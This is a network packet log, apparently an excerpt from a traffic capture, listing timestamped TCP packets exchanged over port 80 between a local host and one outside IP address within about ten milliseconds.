Dec 24, 2023 10:44:30.523683071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.523700953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.523736000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.523746014 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.523756027 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.523776054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.523787975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.523857117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.523900032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.523940086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.523977041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524014950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524049044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524049997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524096966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524106979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524142981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524163008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524183989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524189949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524266958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524291039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524307966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524322987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524332047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524343014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524363995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524408102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524421930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524439096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524458885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524481058 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524497032 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524523973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524538994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524576902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524602890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524616957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524640083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524656057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524698019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524741888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524760008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524780035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524782896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524805069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524847984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524863005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524899960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524908066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.524943113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524957895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.524981976 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525002003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525039911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525074005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525093079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525135040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525312901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525335073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525358915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525372982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525386095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525398016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525404930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525438070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525443077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525454044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525476933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525491953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525496006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525512934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525532961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525542021 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525549889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525582075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525598049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525618076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525630951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525645971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525698900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525738955 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525769949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525824070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525851965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525867939 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525881052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525890112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525903940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525921106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525940895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.525964022 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525980949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.525995970 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526062012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526108027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.526160002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526247978 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526289940 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.526304007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526319027 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526355028 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526361942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.526376009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526433945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526448965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526477098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.526499987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.526514053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526531935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526551008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526572943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.526590109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526643038 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526663065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526678085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526679993 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.526706934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.526750088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526843071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.526885986 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.526890993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527021885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527057886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.527111053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527154922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527198076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.527218103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527262926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527281046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527302980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.527322054 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.527363062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527376890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527390957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527426958 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.527431965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527532101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527570009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.527594090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527632952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.527647972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527709961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527743101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.527791977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527861118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.527899027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.527982950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528006077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528053045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528070927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528090954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528091908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528112888 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528139114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528173923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528218031 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528232098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528247118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528283119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528285980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528305054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528322935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528362036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528381109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528418064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528451920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528466940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528501034 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528507948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528527975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528546095 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528553963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528600931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528620005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528640985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528641939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528678894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528692961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528742075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528757095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528783083 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528803110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528816938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528832912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528863907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528867960 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.528923988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528951883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.528978109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.529010057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529087067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529102087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529128075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.529146910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.529231071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529309034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529350996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.529406071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529428005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529465914 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.529478073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529522896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529588938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529607058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529622078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529627085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.529650927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.529700994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529726982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529746056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529761076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529769897 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.529791117 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.529793978 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529849052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529881954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.529906988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529943943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.529983997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530015945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530030966 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530051947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530052900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530107021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530152082 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530172110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530214071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530246019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530263901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530287027 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530299902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530323029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530344009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530364990 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530371904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530421972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530452967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530462980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530472040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530484915 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530540943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530580044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530605078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530623913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530652046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530666113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530669928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530709982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530719042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530771971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530838966 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530877113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530891895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530919075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.530956030 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.530983925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531023979 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.531023979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531060934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531107903 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.531135082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531228065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531248093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531263113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531274080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.531311035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531315088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.531327009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531363964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531364918 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.531385899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531426907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531445026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.531558990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531586885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.531595945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531599998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.531656981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531723976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.531768084 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.531927109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532028913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532069921 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532098055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532115936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532140017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532171011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532218933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532238960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532263994 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532293081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532298088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532314062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532331944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532361031 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532387972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532411098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532424927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532426119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532464027 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532470942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532500982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532501936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532557964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532572985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532605886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532612085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532648087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532648087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532649040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532659054 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532670021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532675028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532694101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532716036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532742023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532780886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532799006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532844067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532910109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532936096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.532959938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532983065 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.532991886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533016920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533031940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533060074 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.533083916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533104897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533124924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533145905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.533168077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.533189058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533215046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533241034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533255100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.533262014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533291101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533298969 CET	49716	80	192.168.2.5	91.215.85.17
